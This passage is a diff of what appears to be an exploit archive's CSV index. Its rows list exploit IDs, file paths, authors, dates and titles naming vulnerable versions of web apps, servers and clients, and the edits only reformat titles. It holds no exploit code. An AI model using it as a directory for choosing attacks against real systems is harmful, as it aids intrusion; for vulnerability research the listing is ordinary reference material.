25033,platforms/windows/remote/25033.txt,"GREED 0.81 GRX File List Buffer Overflow Vulnerability",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0 @@ -22162,7 +22160,7 @@ id,file,description,date,author,platform,type,port 25038,platforms/php/webapps/25038.txt,"Kayako eSupport 2.x Ticket System Multiple SQL Injection",2004-12-18,"James Bercegay",php,webapps,0 25039,platforms/aix/local/25039.txt,"IBM AIX 5.x Diag Local Privilege Escalation Vulnerabilities",2004-12-20,cees-bart,aix,local,0 25040,platforms/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module Offset Memory Corruption Vulnerability",2004-12-20,"Stefano Di Paola",php,local,0 -25041,platforms/cgi/webapps/25041.txt,"EScripts Software E_Board 4.0 Directory Traversal Vulnerability",2004-12-20,white_e@nogimmick.org,cgi,webapps,0 +25041,platforms/cgi/webapps/25041.txt,"escripts software e_board 4.0 - Directory Traversal vulnerability",2004-12-20,white_e@nogimmick.org,cgi,webapps,0 25042,platforms/cgi/webapps/25042.txt,"Tlen.pl 5.23.4 .1 Instant Messenger Remote Script Execution Vulnerability",2004-12-20,"Jaroslaw Sajko",cgi,webapps,0 25043,platforms/php/webapps/25043.txt,"PHPGroupWare 0.9.14 Tables_Update.Inc.PHP Remote File Include Vulnerability",2004-01-27,"Cedric Cochin",php,webapps,0 25044,platforms/php/webapps/25044.txt,"PHPGroupWare 0.9.x Index.PHP HTML Injection Vulnerability",2004-01-27,"Cedric Cochin",php,webapps,0 @@ -22175,29 +22173,29 @@ id,file,description,date,author,platform,type,port 25051,platforms/cgi/webapps/25051.txt,"Wirtualna Polska WPKontakt 3.0.1 Remote Script Execution Vulnerability",2004-12-23,"Poznan Supercomputing",cgi,webapps,0 25052,platforms/php/webapps/25052.pl,"Siteman 1.1 User Database Privilege Escalation Vulnerability (1)",2005-01-19,"Noam Rathaus",php,webapps,0 25053,platforms/php/webapps/25053.html,"Siteman 1.1 User Database Privilege Escalation Vulnerability (2)",2005-01-19,amironline452,php,webapps,0 -25054,platforms/linux/remote/25054.txt,"Konversation IRC Client 0.15 Multiple Remote Vulnerabilities",2005-01-19,wouter@coekaerts.be,linux,remote,0 +25054,platforms/linux/remote/25054.txt,"konversation irc client 0.15 Multiple Vulnerabilities",2005-01-19,wouter@coekaerts.be,linux,remote,0 25055,platforms/osx/local/25055.c,"Darwin Kernel 7.1 Mach File Parsing Local Integer Overflow Vulnerability",2005-01-19,nemo@felinemenace.org,osx,local,0 25056,platforms/multiple/dos/25056.html,"Netscape Navigator 7.2 Infinite Array Sort Denial of Service Vulnerability",2005-01-21,"Berend-Jan Wever",multiple,dos,0 25057,platforms/windows/remote/25057.txt,"DivX Player 2.6 Skin File Directory Traversal Vulnerability",2005-01-21,"Luigi Auriemma",windows,remote,0 25058,platforms/php/webapps/25058.txt,"Exponent CMS 0.95 Multiple Cross-Site Scripting Vulnerabilities",2005-12-25,y3dips,php,webapps,0 25059,platforms/php/webapps/25059.txt,"MercuryBoard 1.1 Multiple Input Validation Vulnerabilities",2005-01-25,"Alberto Trivero",php,webapps,0 -25060,platforms/asp/webapps/25060.txt,"Comersus Cart 5.0/6.0 Multiple Vulnerabilities",2005-01-25,"raf somers",asp,webapps,0 +25060,platforms/asp/webapps/25060.txt,"Comersus Cart 5.0/6.0 - Multiple Vulnerabilities",2005-01-25,"raf somers",asp,webapps,0 25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x Variant IN_CDDA.dll Remote Buffer Overflow Vulnerability",2005-01-25,"Yu Yang",windows,dos,0 25062,platforms/php/webapps/25062.txt,"Comdev eCommerce 3.0 INDEX.PHP Multiple Cross-Site Scripting Vulnerabilities",2005-01-25,SmOk3,php,webapps,0 25063,platforms/windows/dos/25063.pl,"War FTP Daemon 1.8 Remote Denial Of Service Vulnerability",2005-01-27,MC.Iglo,windows,dos,0 25064,platforms/php/webapps/25064.txt,"Magic Winmail Server 4.0 (Build 1112) download.php Traversal Arbitrary File Access",2005-01-27,"Tan Chew Keong",php,webapps,0 25065,platforms/php/webapps/25065.txt,"Magic Winmail Server 4.0 (Build 1112) upload.php Traversal Arbitrary File Upload",2005-01-27,"Tan Chew Keong",php,webapps,0 25066,platforms/multiple/remote/25066.txt,"WebWasher Classic 2.2/2.3 HTTP CONNECT Unauthorized Access",2005-01-28,"Oliver Karow",multiple,remote,0 -25067,platforms/cgi/webapps/25067.txt,"Alt-N WebAdmin 3.0.2 Multiple Remote Vulnerabilities",2005-01-28,"David A. P?rez",cgi,webapps,0 +25067,platforms/cgi/webapps/25067.txt,"alt-n webadmin 3.0.2 Multiple Vulnerabilities",2005-01-28,"David A. P?rez",cgi,webapps,0 25068,platforms/php/webapps/25068.txt,"IceWarp Web Mail 5.3 login.html username Parameter XSS",2005-01-28,ShineShadow,php,webapps,0 25069,platforms/php/webapps/25069.txt,"IceWarp Web Mail 5.3 accountsettings_add.html accountid Parameter XSS",2005-01-28,ShineShadow,php,webapps,0 25070,platforms/linux/dos/25070.c,"ngIRCd 0.6/0.7/0.8 Remote Buffer Overflow Vulnerability",2005-01-28,"Florian Westphal",linux,dos,0 25071,platforms/php/webapps/25071.txt,"Captaris Infinite Mobile Delivery Webmail 2.6 Path Disclosure Vulnerability",2005-01-29,steven@lovebug.org,php,webapps,0 25072,platforms/multiple/remote/25072.txt,"CitrusDB 0.1/0.2/0.3 Credit Card Data Remote Information Disclosure Vulnerability",2005-01-31,"Maximillian Dornseif",multiple,remote,0 25073,platforms/php/webapps/25073.txt,"JShop E-Commerce Suite 1.2 Product.PHP Cross-Site Scripting Vulnerability",2005-01-31,SmOk3,php,webapps,0 -25074,platforms/php/webapps/25074.txt,"Xoops Incontent Module 3.0 Directory Traversal Vulnerability",2005-01-28,Lostmon,php,webapps,0 +25074,platforms/php/webapps/25074.txt,"xoops incontent module 3.0 - Directory Traversal vulnerability",2005-01-28,Lostmon,php,webapps,0 25075,platforms/multiple/dos/25075.pl,"Eternal Lines Web Server 1.0 Remote Denial Of Service Vulnerability",2005-02-01,"Ziv Kamir",multiple,dos,0 -25076,platforms/linux/dos/25076.c,"PostgreSQL 7.x Multiple Remote Vulnerabilities",2005-02-01,ChoiX,linux,dos,0 +25076,platforms/linux/dos/25076.c,"postgresql 7.x Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0 25077,platforms/linux/dos/25077.txt,"Newspost 2.0/2.1 Remote Buffer Overflow Vulnerability",2005-02-01,"Niels Heinen",linux,dos,0 25078,platforms/asp/webapps/25078.txt,"Eurofull E-Commerce Mensresp.ASP Cross-Site Scripting Vulnerability",2005-02-02,Yani-ari,asp,webapps,0 25079,platforms/multiple/remote/25079.txt,"People Can Fly Painkiller Gamespy 1.3 CD-Key Hash Remote Buffer Overflow Vulnerability",2005-02-02,"Luigi Auriemma",multiple,remote,0 @@ -22212,7 +22210,7 @@ id,file,description,date,author,platform,type,port 25088,platforms/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps,0 25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 Viewthread.PHP Information Disclosure Vulnerbility",2005-02-08,TheGreatOne2176,php,webapps,0 25090,platforms/php/webapps/25090.txt,"XGB 2.0 Authentication Bypass Vulnerability",2005-02-08,"Albania Security Clan",php,webapps,0 -25091,platforms/multiple/remote/25091.txt,"RealNetworks RealArcade 1.2 .0.994 Multiple Remote Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 +25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2 .0.994 Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 25092,platforms/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 Arbitrary File Upload Vulnerability",2005-02-08,"Tan Chew Keong",windows,remote,0 25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 INDEX.PHP SQL Injection Vulnerability",2005-02-09,Zeelock,php,webapps,0 25094,platforms/windows/remote/25094.c,"MSN Messenger 6.2.0137 PNG Buffer Overflow Vulnerability",2005-02-08,ATmaCA,windows,remote,0 @@ -22231,7 +22229,7 @@ id,file,description,date,author,platform,type,port 25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient Malformed IP Address Local Memory Access Vulnerability",2005-02-16,"Wang Ning",hardware,dos,0 25108,platforms/cgi/webapps/25108.txt,"AWStats 5.x/6.x Logfile Parameter Remote Command Execution Vulnerability",2005-02-16,newbug@chroot.org,cgi,webapps,0 25109,platforms/php/webapps/25109.txt,"DCP-Portal 6.1.1 Multiple SQL Injection Vulnerabilities",2005-02-16,Exoduks,php,webapps,0 -25110,platforms/asp/webapps/25110.txt,"Microsoft ASP.NET 1.0/1.1 Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-16,"Andrey Rusyaev",asp,webapps,0 +25110,platforms/asp/webapps/25110.txt,"Microsoft ASP.NET 1.0/1.1 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-16,"Andrey Rusyaev",asp,webapps,0 25111,platforms/php/webapps/25111.txt,"PaNews 2.0 Cross-Site Scripting Vulnerability",2005-02-16,pi3ch,php,webapps,0 25112,platforms/php/webapps/25112.txt,"MercuryBoard Forum 1.0/1.1 Remote Cross-Site Scripting Vulnerability",2005-02-16,Lostmon,php,webapps,0 25113,platforms/php/webapps/25113.txt,"WebCalendar 0.9.45 SQL Injection Vulnerability",2005-02-17,"Michael Scovetta",php,webapps,0 @@ -22254,7 +22252,7 @@ id,file,description,date,author,platform,type,port 25130,platforms/windows/local/25130.py,"FuzeZip 1.0.0.131625 - SEH Buffer Overflow",2013-05-01,RealPentesting,windows,local,0 25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - SEH Buffer Overflow",2013-05-01,RealPentesting,windows,local,0 25132,platforms/multiple/remote/25132.txt,"Bontago Game Server 1.1 Remote Nickname Buffer Overrun Vulnerability",2005-02-21,"Luigi Auriemma",multiple,remote,0 -25133,platforms/multiple/remote/25133.txt,"Xinkaa WEB Station 1.0.3 Directory Traversal Vulnerability",2005-02-21,"Luigi Auriemma",multiple,remote,0 +25133,platforms/multiple/remote/25133.txt,"xinkaa web station 1.0.3 - Directory Traversal vulnerability",2005-02-21,"Luigi Auriemma",multiple,remote,0 25134,platforms/linux/local/25134.c,"sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0 25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) - Cross Site Scripting Vulnerability",2013-05-01,demonalex,windows,dos,0 25136,platforms/php/remote/25136.rb,"phpMyAdmin Authenticated Remote Code Execution via preg_replace()",2013-05-01,metasploit,php,remote,0 @@ -22265,11 +22263,11 @@ id,file,description,date,author,platform,type,port 25141,platforms/windows/local/25141.rb,"AudioCoder 0.8.18 - Buffer Overflow Exploit (SEH)",2013-05-02,metacom,windows,local,0 25142,platforms/hardware/webapps/25142.txt,"D-Link DNS-323 - Multiple Vulnerabilities",2013-05-02,sghctoma,hardware,webapps,0 25143,platforms/php/webapps/25143.txt,"Invision Power Board 1.x/2.0.3 SML Code Script Injection Vulnerability",2005-02-21,"Daniel A.",php,webapps,0 -25144,platforms/windows/remote/25144.txt,"SD Server 4.0.70 Directory Traversal Vulnerability",2005-02-21,CorryL,windows,remote,0 +25144,platforms/windows/remote/25144.txt,"sd server 4.0.70 - Directory Traversal vulnerability",2005-02-21,CorryL,windows,remote,0 25145,platforms/php/webapps/25145.txt,"PANews 2.0 Remote PHP Script Code Execution Vulnerability",2005-02-21,tjomka,php,webapps,0 25146,platforms/windows/remote/25146.txt,"OpenConnect WebConnect 6.4/6.5 jretest.html Traversal Arbitrary File Access",2005-02-21,"Dennis Rand",windows,remote,0 25147,platforms/cgi/webapps/25147.txt,"Biz Mail Form 2.x Unauthorized Mail Relay Vulnerability",2005-02-22,"Jason Frisvold",cgi,webapps,0 -25148,platforms/asp/webapps/25148.txt,"Mono 1.0.5 Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-22,"Andrey Rusyaev",asp,webapps,0 +25148,platforms/asp/webapps/25148.txt,"Mono 1.0.5 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-22,"Andrey Rusyaev",asp,webapps,0 25149,platforms/php/webapps/25149.txt,"iGeneric iG Shop 1.x Multiple SQL Injection Vulnerabilities",2005-02-22,"John Cobb",php,webapps,0 25150,platforms/linux/remote/25150.txt,"Winace UnAce 1.x ACE Archive Remote Directory Traversal Vulnerability",2005-02-23,"Ulf Harnhammar",linux,remote,0 25151,platforms/php/webapps/25151.txt,"PBLang Bulletin Board System 4.6 Search.PHP Cross-Site Scripting Vulnerability",2005-02-23,"Hackerlounge Research Group",php,webapps,0 @@ -22280,7 +22278,7 @@ id,file,description,date,author,platform,type,port 25156,platforms/php/webapps/25156.txt,"phpMyAdmin 2.6 Multiple Local File Include Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25157,platforms/windows/remote/25157.txt,"Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability",2003-04-29,"Shane Hird",windows,remote,0 25158,platforms/php/webapps/25158.txt,"OOApp Guestbook Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0 -25159,platforms/jsp/webapps/25159.txt,"Cyclades AlterPath Manager 1.1 Multiple Remote Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps,0 +25159,platforms/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps,0 25160,platforms/php/webapps/25160.txt,"PunBB 3.0/3.1 Multiple Remote Input Validation Vulnerabilities",2005-02-24,"John Gumbel",php,webapps,0 25161,platforms/php/webapps/25161.txt,"PHPWebSite 0.x Image File Processing Remote Arbitrary PHP File Upload Vulnerability",2005-02-24,tjomka,php,webapps,0 25162,platforms/php/webapps/25162.txt,"CubeCart 2.0.x Multiple Cross-Site Scripting Vulnerabilities",2005-02-25,Lostmon,php,webapps,0 @@ -22311,7 +22309,7 @@ id,file,description,date,author,platform,type,port 25187,platforms/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x Directory Traversal Vulnerability",2005-03-03,"Kristof Philipsen",windows,remote,0 25188,platforms/windows/remote/25188.txt,"Opera 7.x, Firefox 1.0, Internet Explorer 6.0 Information Disclosure Weakness",2005-02-19,upken,windows,remote,0 25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 Arbitrary Remote PHP File Include Vulnerability",2005-03-04,"Filip Groszynski",php,webapps,0 -25190,platforms/multiple/remote/25190.txt,"Ca3DE Multiple Remote Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0 +25190,platforms/multiple/remote/25190.txt,"ca3de Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0 25191,platforms/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 Remote Buffer Overflow Vulnerability",2005-03-07,"Luigi Auriemma",multiple,remote,0 25192,platforms/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 Remote File Include Vulnerability",2005-03-05,mozako,php,webapps,0 25193,platforms/php/webapps/25193.txt,"Jason Hines PHPWebLog 0.4/0.5 Remote File Include Vulnerability",2005-03-07,"Filip Groszynski",php,webapps,0 @@ -22327,8 +22325,8 @@ id,file,description,date,author,platform,type,port 25203,platforms/linux/local/25203.c,"Linux Kernel 2.6.x SYS_EPoll_Wait Local Integer Overflow Vulnerability (2)",2005-03-09,alert7,linux,local,0 25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - (.lst) Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0 25205,platforms/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 Remote Format String Vulnerability",2005-03-10,"Luigi Auriemma",multiple,remote,0 -25206,platforms/php/webapps/25206.txt,"PHPOutsourcing Zorum 3.5 Multiple Remote Vulnerabilities",2005-03-10,benjilenoob,php,webapps,0 -25207,platforms/windows/remote/25207.txt,"PY Software Active Webcam Webserver 4.3/5.5 Multiple Vulnerabilities",2005-03-10,sowhat,windows,remote,0 +25206,platforms/php/webapps/25206.txt,"phpoutsourcing zorum 3.5 Multiple Vulnerabilities",2005-03-10,benjilenoob,php,webapps,0 +25207,platforms/windows/remote/25207.txt,"py software active webcam webserver 4.3/5.5 - Multiple Vulnerabilities",2005-03-10,sowhat,windows,remote,0 25208,platforms/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 adm-photo.php Arbitrary Image Manipulation",2005-03-10,"Igor Franchuk",php,webapps,0 25209,platforms/multiple/remote/25209.pl,"MySQL 4.x CREATE FUNCTION Arbitrary libc Code Execution",2005-03-11,"Stefano Di Paola",multiple,remote,0 25210,platforms/multiple/remote/25210.php,"MySQL 4.x CREATE FUNCTION mysql.func Table Arbitrary Library Injection",2005-03-11,"Stefano Di Paola",multiple,remote,0 @@ -22456,7 +22454,7 @@ id,file,description,date,author,platform,type,port 25335,platforms/unix/remote/25335.txt,"IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability",2005-04-04,"Shalom Carmel",unix,remote,0 25336,platforms/windows/remote/25336.txt,"Logics Software LOG-FT Arbitrary File Disclosure Vulnerability",2005-04-05,"Pedro Viuales and Rom Ramirez",windows,remote,0 25337,platforms/php/webapps/25337.txt,"ProfitCode Software PayProCart 3.0 Usrdetails.PHP Cross-Site Scripting Vulnerability",2005-04-05,"Diabolic Crab",php,webapps,0 -25338,platforms/php/webapps/25338.txt,"ProfitCode Software PayProCart 3.0 Directory Traversal Vulnerability",2005-04-05,"Diabolic Crab",php,webapps,0 +25338,platforms/php/webapps/25338.txt,"profitcode software payprocart 3.0 - Directory Traversal vulnerability",2005-04-05,"Diabolic Crab",php,webapps,0 25339,platforms/php/webapps/25339.txt,"PHP-Nuke 6.x/7.x Your_Account Module Username Cross-Site Scripting Vulnerability",2005-04-05,sp3x@securityreason.com,php,webapps,0 25340,platforms/php/webapps/25340.txt,"PHP-Nuke 6.x/7.x Your_Account Module Avatarcategory Cross-Site Scripting Vulnerability",2005-04-05,sp3x@securityreason.com,php,webapps,0 25341,platforms/php/webapps/25341.html,"PHP-Nuke 6.x/7.x Downloads Module Lid Parameter Cross-Site Scripting Vulnerability",2005-04-05,sp3x@securityreason.com,php,webapps,0 @@ -22603,7 +22601,7 @@ id,file,description,date,author,platform,type,port 25484,platforms/asp/webapps/25484.txt,"DUportal 3.1.2 inc_rating.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25485,platforms/asp/webapps/25485.txt,"DUportal 3.1.2 type.asp iCat Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25486,platforms/windows/remote/25486.txt,"RaidenFTPD 2.4 Unauthorized File Access Vulnerability",2005-04-21,"Lachlan. H",windows,remote,0 -25487,platforms/windows/remote/25487.txt,"Yawcam 0.2.5 Directory Traversal Vulnerability",2005-04-21,"Donato Ferrante",windows,remote,0 +25487,platforms/windows/remote/25487.txt,"yawcam 0.2.5 - Directory Traversal vulnerability",2005-04-21,"Donato Ferrante",windows,remote,0 25488,platforms/php/webapps/25488.txt,"ProfitCode Software PayProCart 3.0 Username Cross-Site Scripting Vulnerability",2005-04-21,Lostmon,php,webapps,0 25489,platforms/php/webapps/25489.txt,"ProfitCode Software PayProCart 3.0 Ckprvd Cross-Site Scripting Vulnerability",2005-04-21,Lostmon,php,webapps,0 25490,platforms/php/webapps/25490.txt,"ProfitCode Software PayProCart 3.0 AdminShop HDoc Cross-Site Scripting Vulnerability",2005-04-21,Lostmon,php,webapps,0 @@ -22687,7 +22685,7 @@ id,file,description,date,author,platform,type,port 25568,platforms/php/webapps/25568.txt,"phpCOIN 1.2 login.php phpcoinsessid Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 25569,platforms/php/webapps/25569.txt,"phpCOIN 1.2 Pages Module Multiple Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 25570,platforms/php/webapps/25570.txt,"JGS-Portal 3.0.1 ID Variable SQL Injection Vulnerability",2005-04-30,admin@batznet.com,php,webapps,0 -25571,platforms/windows/remote/25571.txt,"Video Cam Server 1.0 Directory Traversal Vulnerability",2005-05-02,"Donato Ferrante",windows,remote,0 +25571,platforms/windows/remote/25571.txt,"video cam server 1.0 - Directory Traversal vulnerability",2005-05-02,"Donato Ferrante",windows,remote,0 25572,platforms/windows/remote/25572.txt,"Video Cam Server 1.0 Path Disclosure Vulnerability",2005-05-02,"Donato Ferrante",windows,remote,0 25573,platforms/windows/remote/25573.txt,"Video Cam Server 1.0 Administrative Interface Authentication Bypass Vulnerability",2005-05-02,"Donato Ferrante",windows,remote,0 25574,platforms/multiple/remote/25574.txt,"Mtp-Target 1.2.2 Client Remote Format String Vulnerability",2005-05-02,"Luigi Auriemma",multiple,remote,0 @@ -22712,8 +22710,8 @@ id,file,description,date,author,platform,type,port 25596,platforms/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 Details.ASP SQL Injection Vulnerability",2005-05-04,Zinho,asp,webapps,0 25597,platforms/windows/remote/25597.txt,"Adobe SVG Viewer 3.0 ActiveX Control SRC Information Disclosure Vulnerability",2005-05-04,"Robert Fly",windows,remote,0 25598,platforms/osx/remote/25598.txt,"Apple Mac OS X 10.x BlueTooth Directory Traversal Vulnerability",2005-05-04,"Kevin Finisterre",osx,remote,0 -25599,platforms/php/webapps/25599.txt,"Interspire ArticleLive 2005 Multiple Remote Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 -25600,platforms/windows/remote/25600.txt,"SimpleCam 1.2 Directory Traversal Vulnerability",2005-05-04,"Donato Ferrante",windows,remote,0 +25599,platforms/php/webapps/25599.txt,"interspire articlelive 2005 Multiple Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 +25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal vulnerability",2005-05-04,"Donato Ferrante",windows,remote,0 25601,platforms/php/webapps/25601.txt,"FishCart 3.1 display.php nlst Parameter XSS",2005-05-04,Dcrab,php,webapps,0 25602,platforms/php/webapps/25602.txt,"FishCart 3.1 upstracking.php Multiple Parameter XSS",2005-05-04,Dcrab,php,webapps,0 25603,platforms/php/webapps/25603.txt,"FishCart 3.1 display.php psku Parameter SQL Injection",2005-05-04,Dcrab,php,webapps,0 @@ -22733,7 +22731,7 @@ id,file,description,date,author,platform,type,port 25618,platforms/php/webapps/25618.txt,"MidiCart PHP Search_List.PHP SearchString Parameter Cross-Site Scripting Vulnerability",2005-05-05,Exoduks,php,webapps,0 25619,platforms/php/webapps/25619.txt,"MidiCart PHP Item_List.PHP SecondGroup Parameter Cross-Site Scripting Vulnerability",2005-05-05,Exoduks,php,webapps,0 25620,platforms/php/webapps/25620.txt,"MidiCart PHP Item_List.PHP Maingroup Parameter Cross-Site Scripting Vulnerability",2005-05-05,Exoduks,php,webapps,0 -25621,platforms/windows/remote/25621.txt,"Software602 602 LAN Suite 2004 Directory Traversal Vulnerability",2005-05-05,dr_insane,windows,remote,0 +25621,platforms/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal vulnerability",2005-05-05,dr_insane,windows,remote,0 25622,platforms/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 Admin.CGI EntryID Cross-Site Scripting Vulnerability",2005-05-05,"Spy Hat",cgi,webapps,0 25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 OUT.PHP SQL Injection Vulnerability",2005-05-06,Kold,php,webapps,0 25624,platforms/unix/remote/25624.c,"Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)",2005-05-06,"Luca Ercoli",unix,remote,0 @@ -22760,8 +22758,8 @@ id,file,description,date,author,platform,type,port 25645,platforms/php/webapps/25645.txt,"e107 Website System 0.617 Forum_viewforum.PHP SQL Injection Vulnerability",2005-05-10,Heintz,php,webapps,0 25646,platforms/windows/remote/25646.txt,"MyServer 0.8 Cross-Site Scripting Vulnerability",2005-05-10,dr_insane,windows,remote,0 25647,platforms/linux/local/25647.sh,"Linux Kernel 2.2.x.2.3.x/2.4.x/2.5.x/2.6.x ELF Core Dump Local Buffer Overflow Vulnerability",2005-05-11,"Paul Starzetz",linux,local,0 -25648,platforms/cgi/remote/25648.txt,"Neteyes NexusWay Border Gateway Multiple Remote Vulnerabilities",2005-05-11,pokley,cgi,remote,0 -25649,platforms/cgi/webapps/25649.txt,"ShowOff! Digital Media Software 1.5.4 Multiple Remote Vulnerabilities",2011-05-11,dr_insane,cgi,webapps,0 +25648,platforms/cgi/remote/25648.txt,"neteyes nexusway border gateway Multiple Vulnerabilities",2005-05-11,pokley,cgi,remote,0 +25649,platforms/cgi/webapps/25649.txt,"showoff! digital media software 1.5.4 Multiple Vulnerabilities",2011-05-11,dr_insane,cgi,webapps,0 25650,platforms/php/webapps/25650.txt,"Open Solution Quick.Cart 0.3 Index.PHP Cross-Site Scripting Vulnerability",2005-05-11,Lostmon,php,webapps,0 25651,platforms/asp/webapps/25651.txt,"MaxWebPortal 1.3x post.asp Multiple Parameter XSS",2005-05-11,Zinho,asp,webapps,0 25652,platforms/windows/remote/25652.txt,"APG Technology ClassMaster Unauthorized Folder Access Vulnerability",2005-05-12,"Alex Garrett",windows,remote,0 @@ -22781,7 +22779,7 @@ id,file,description,date,author,platform,type,port 25666,platforms/cgi/webapps/25666.txt,"PServ 3.2 Remote Source Code Disclosure Vulnerability",2005-05-16,"Claus R. F. Overbeck",cgi,webapps,0 25667,platforms/asp/webapps/25667.txt,"MetaCart E-Shop ProductsByCategory.ASP Cross-Site Scripting Vulnerability",2005-05-16,"Dedi Dwianto",asp,webapps,0 25668,platforms/cgi/webapps/25668.txt,"Sigma ISP Manager 6.6 Sigmaweb.DLL SQL Injection Vulnerability",2005-05-16,"mehran gashtasebi",cgi,webapps,0 -25669,platforms/linux/remote/25669.txt,"Pserv 3.2 Directory Traversal Vulnerability",2005-05-16,"Claus R. F. Overbeck",linux,remote,0 +25669,platforms/linux/remote/25669.txt,"pserv 3.2 - Directory Traversal vulnerability",2005-05-16,"Claus R. F. Overbeck",linux,remote,0 25670,platforms/multiple/remote/25670.html,"Mozilla Suite And Firefox DOM Property Overrides Code Execution Vulnerability",2005-05-16,moz_bug_r_a4,multiple,remote,0 25671,platforms/php/webapps/25671.txt,"NPDS 4.8/5.0 comments.php thold Parameter SQL Injection",2005-05-16,NoSP,php,webapps,0 25672,platforms/php/webapps/25672.txt,"NPDS 4.8/5.0 pollcomments.php thold Parameter SQL Injection",2005-05-16,NoSP,php,webapps,0 @@ -22865,7 +22863,7 @@ id,file,description,date,author,platform,type,port 25752,platforms/php/dos/25752.txt,"PHPMailer 1.7 Data() Function Remote Denial of Service Vulnerability",2005-05-28,"Mariano Nunez Di Croce",php,dos,0 25753,platforms/asp/webapps/25753.txt,"Hosting Controller 6.1 resellerresources.asp jresourceid Parameter SQL Injection",2005-05-28,"GrayHatz Security Group",asp,webapps,0 25754,platforms/asp/webapps/25754.txt,"Hosting Controller 6.1 plandetails.asp Information Disclosure",2005-05-28,"GrayHatz Security Group",asp,webapps,0 -25755,platforms/windows/remote/25755.txt,"ServersCheck 5.9/5.10 Directory Traversal Vulnerability",2005-05-30,rgod,windows,remote,0 +25755,platforms/windows/remote/25755.txt,"serverscheck 5.9/5.10 - Directory Traversal vulnerability",2005-05-30,rgod,windows,remote,0 25756,platforms/php/webapps/25756.txt,"India Software Solution Shopping Cart SQL Injection Vulnerability",2005-05-28,Rayden,php,webapps,0 25757,platforms/multiple/dos/25757.txt,"Firefly Studios Stronghold 2 Remote Denial of Service Vulnerability",2005-05-28,"Luigi Auriemma",multiple,dos,0 25758,platforms/asp/webapps/25758.txt,"Hosting Controller 6.1 User Profile Unauthorized Access Vulnerability",2005-05-30,"GrayHatz Security Group",asp,webapps,0 @@ -23031,7 +23029,7 @@ id,file,description,date,author,platform,type,port 25921,platforms/windows/dos/25921.txt,"Raven Software Soldier Of Fortune 2 Ignore Command Remote Denial of Service Vulnerability",2005-06-29,"Luigi Auriemma",windows,dos,0 25922,platforms/asp/webapps/25922.txt,"CyberStrong EShop 4.2 20review.ASP SQL Injection Vulnerability",2005-06-30,aresu@bosen.net,asp,webapps,0 25923,platforms/asp/webapps/25923.txt,"CyberStrong eShop 4.2 10expand.ASP SQL Injection Vulnerability",2005-06-30,aresu@bosen.net,asp,webapps,0 -25924,platforms/asp/webapps/25924.txt,"FSboard 2.0 Directory Traversal Vulnerability",2005-06-30,ActualMInd,asp,webapps,0 +25924,platforms/asp/webapps/25924.txt,"fsboard 2.0 - Directory Traversal vulnerability",2005-06-30,ActualMInd,asp,webapps,0 25925,platforms/asp/webapps/25925.txt,"CyberStrong EShop 4.2 10browse.ASP SQL Injection Vulnerability",2005-06-30,aresu@bosen.net,asp,webapps,0 25926,platforms/php/webapps/25926.txt,"OSTicket 1.2/1.3 view.php inc Variable Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x Graph_Image.PHP Remote Command Execution Variant Vulnerability",2005-07-01,"Alberto Trivero",php,webapps,0 @@ -23040,7 +23038,7 @@ id,file,description,date,author,platform,type,port 25930,platforms/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x header.inc.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25931,platforms/php/webapps/25931.txt,"EasyPHPCalendar 6.1.5/6.2.x 